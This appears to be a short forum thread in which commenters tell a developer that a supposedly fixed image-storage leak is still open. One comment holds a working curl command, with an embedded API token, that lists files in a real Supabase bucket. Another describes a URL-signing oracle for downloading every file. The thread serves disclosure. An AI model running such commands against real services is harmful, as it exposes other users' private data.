[imgopaal]

Also Fixed. Images now use signed URLs with 1-year expiration. Public URLs are automatically converted to signed URLs. Storage bucket policies restrict access to user-specific folders. Appreciate you flagging this.

[foltik]

It appears to still be wide open:

  curl -X POST \
    "https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/list/clipboard-images" \
    -H "authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6IndqeW5tamx1YWJxd3FodGR4YnRsIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NDIzODU1MDQsImV4cCI6MjA1Nzk2MTUwNH0.R6pSgPFgHe3ZU9DfKykE98MC1ObYihWdZuhy9v9Y_p0" \
    -H "content-type: application/json" \
    -d '{"prefix": "7b407af2-f30c-4e37-adc7-b7bf48f2661b"}' \
    | jq

[Retr0id]

There is also an URL-signing oracle that allows any URL to be signed, so it's still possible to enumerate + download all files.

Example: https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/s...